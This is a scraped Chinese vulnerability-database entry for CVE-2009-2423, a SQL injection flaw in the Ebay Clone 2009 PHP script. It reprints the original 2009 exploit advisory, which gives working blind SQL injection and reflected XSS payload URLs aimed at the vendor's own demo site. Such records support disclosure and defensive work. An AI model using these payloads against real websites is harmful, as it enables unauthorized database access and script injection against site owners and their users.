https://www.exploit-db.com/exploits/9118
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-163
Ebay Clone 2009 category.php脚本SQL注入漏洞






漏洞ID | 1118081 | 漏洞类型 | SQL注入 |
发布时间 | 2009-07-10 | 更新时间 | 2009-07-13 |
![]() |
CVE-2009-2423 | ![]() |
CNNVD-200907-163 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
EbayClone2009的category.php存在SQL注入漏洞会允许远程攻击者通过一个列表程序中的cate_id参数来执行任意SQL命令。
|漏洞EXP
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] I'm back <3 VB6
==============================================================================
[»] Ebay Clone 2009 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Ebay Clone 2009 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.ebayclonescript.com/ ]
[»] Founder: [ Moudi or SixSo <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[»] Team: [ EvilWay ]
[»] SiteWeb: [ Visit - www.opensc.ws ]
[»] Price: [ 99$ ]
###########################################################################
===[ Exploit BLIND SQL ]===
[»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
[»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
===[ Exploit XSS ]===
[»] http://www.site.com/patch/search.php?mode=[XSS]
[»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Note: in this script have some other blind sql and xss , but i am tired to do all :D
Author: Moudi
###########################################################################
# milw0rm.com [2009-07-10]
|参考资料
来源:SECUNIA
名称:35713
链接:http://secunia.com/advisories/35713
来源:MISC
链接:http://packetstorm.linuxsecurity.com/0907-exploits/ebayclone2009-sqlxss.txt
检索漏洞
开始时间
结束时间